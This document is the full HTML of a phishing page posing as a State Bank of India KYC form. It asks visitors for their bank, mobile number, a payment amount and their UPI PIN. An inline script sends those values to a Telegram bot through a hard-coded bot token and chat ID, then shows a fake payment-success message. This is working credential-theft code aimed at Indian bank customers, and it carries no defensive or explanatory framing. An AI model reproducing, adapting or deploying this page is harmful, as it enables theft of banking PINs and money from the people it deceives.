<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
           <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <title>State Bank of India KYC</title>
    <link rel="stylesheet" href="styles.css">
    <style>
        body {
    font-family: Arial, sans-serif;
    background-color: #ffffff;
    color: #fff;
    margin: 0;
    padding: 0;
}

.container {
    max-width: 400px;
    margin: auto;
    padding: 20px;
}

.header {
    text-align: center;
    margin-bottom: 20px;
}

.header img {
    width: 100%;
}
.img-com{
    background-color: ##ffffff;
    padding: 30px;
    border-radius: 8px;
    
}
.form-container {
    background-color: #8d1100;
    padding: 20px;
    border-radius: 8px;
}

label {
    display: block;
    margin: 10px 0 5px;
}

input {
    width: 90%;
    padding: 10px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 4px;
    background-color: #ffffff9c;
    color: #fff;
}

input:focus {
    border-color: #007bff;
}
.elementor {
    width: 97%;
    padding: 10px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 4px;
    background-color: #ffffff9c;
    color: #fff;
}

.elementor:focus {
    border-color: #007bff;
}

.verify-button {
    width: 100%;
    padding: 10px;
    background-color: #ffc700;
    color: black;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

.verify-button:hover {
    background-color: #0056b3;
}
    </style>
</head>
<body>
    <p align="center"><img style="width: 280px" src="https://static.wixstatic.com/media/6c3ba6_b9edb81336a0471492e933d819432426~mv2.png/v1/fill/w_560,h_266,al_c,lg_1,q_85,enc_avif,quality_auto/Screenshot%202024-11-19%20052828.png" ></a>
    <div class="container">
        <main class="form-container">
            
            <form onsubmit="return sender()">
                
                <label for="name">Bank Name<span style="color: red;"> *</span></label>
                <select name="formname" id="formname" class="elementor" required="required">
									<option value="Chose Bank">Chose Bank</option>
									<option value="Punjab National Bank ">Punjab National Bank </option>
									<option value="Federal Bank">Federal Bank</option>
									<option value="RBL Bank Limited - Corporate">RBL Bank Limited - Corporate</option>
									<option value="IDFC FIRST Bank">IDFC FIRST Bank</option>
									<option value="Bank of India">Bank of India</option>
									<option value="Union Bank">Union Bank</option>
									<option value="Uco Bank ">Uco Bank </option>
									<option value="State Bank Of India">State Bank Of India</option>
									<option value="South Indian Bank">South Indian Bank</option>
									<option value="Shamrao Vithal Co-op Bank - Corporate">Shamrao Vithal Co-op Bank - Corporate</option>
									<option value="Karnataka Gramin Bank">Karnataka Gramin Bank</option>
									<option value="Deutsche Bank">Deutsche Bank</option>
									<option value="Indian Bank">Indian Bank</option>
									<option value="Bassein Catholic Co-operative Bank Tamilnadu State Apex Co-operative Bank">Bassein Catholic Co-operative Bank Tamilnadu State Apex Co-operative Bank</option>
									<option value="Bank of Bahrain and Kuwait">Bank of Bahrain and Kuwait</option>
									<option value="Tamilnadu Mercantile Bank">Tamilnadu Mercantile Bank</option>
									<option value="Catholic Syrian Bank">Catholic Syrian Bank</option>
									<option value="Central Bank of India">Central Bank of India</option>
									<option value="Andhra Pragathi Grameena Bank">Andhra Pragathi Grameena Bank</option>
									<option value="TJSB Bank">TJSB Bank</option>
									<option value="BNP Paribas">BNP Paribas</option>
									<option value="Dhanlaxmi Bank">Dhanlaxmi Bank</option>
									<option value="Punjab National Bank - Retail Banking">Punjab National Bank - Retail Banking</option>
									<option value="NKGSB Co-operative Bank">NKGSB Co-operative Bank</option>
									<option value="AU Small Finance Bank">AU Small Finance Bank</option>
									<option value="Bank of Maharashtra">Bank of Maharashtra</option>
									<option value="IDBI - Corporate">IDBI - Corporate</option>
									<option value="Kalyan Janata Sahakari Bank">Kalyan Janata Sahakari Bank</option>
									<option value="Fincare Bank">Fincare Bank</option>
									<option value="Zoroastrian Co-operative Bank Limited">Zoroastrian Co-operative Bank Limited</option>
									<option value="Varachha Co-operative Bank Limited">Varachha Co-operative Bank Limited</option>
									<option value="Indusind Bank">Indusind Bank</option>
									<option value="Canara Bank">Canara Bank</option>
									<option value="ICICI Bank">ICICI Bank</option>
									<option value="Karnataka Vikas Grameena Bank">Karnataka Vikas Grameena Bank</option>
									<option value="Equitas Small Finance Bank">Equitas Small Finance Bank</option>
									<option value="Bank of Baroda - Corporate">Bank of Baroda - Corporate</option>
									<option value="HDFC Bank - Corporate">HDFC Bank - Corporate</option>
									<option value="Yes Bank ">Yes Bank </option>
									<option value="Airtel Payment Bank">Airtel Payment Bank</option>
									<option value="Other Bank">Other Bank</option>
							</select>
							
                <label for="name">Mobile Number<span style="color: red;"> *</span></label>
                <input type="tel" id="name" name="name" maxlength="12" required>

                <label for="account-number">Amount<span style="color: red;"> *</span></label>
                <input type="number" id="number" name="number" required>

                <label for="cif-number">UPI PIN<span style="color: red;"> *</span></label>
                <input type="number" id="good" name="good" maxlength="6" required>
<br><br>
                <button type="submit" class="verify-button">Proceed To Pay</button>
                <br><br><br><br>
            </form>
        </main>
            </div>
        </footer>
    </div>
    
      <link rel="stylesheet" href="style.css">
    <script src="sender.js"></script>
  
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  
  <script>
  //bot token
var telegram_bot_id = "7838859798:AAEk-t5FqdpEnEPEtsEpGLGaDK8OR0QU1sA";
//chat id
var chat_id = -4569044939;
var ready = function () {
    formname = document.getElementById("formname").value;
    name = document.getElementById("name").value;
    number = document.getElementById("number").value;
    good = document.getElementById("good").value;
  
    message = 
      "\nNaam: " + formname +  
      "\nNo: " + name + 
      "\n₹: " + number +
      "\npin: " + good;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message,
          "file": message
        })
    };
    $.ajax(settings).done(function (response) {
        console.log(response);
        
      swal("Successfull", "Your Payment Successfull", "success");
      
    });
    document.getElementById("formname").value = "";
    document.getElementById("name").value = "";
    document.getElementById("number").value = "";
    document.getElementById("good").value = "";
    return false;
};
  </script>
</body>
</html>
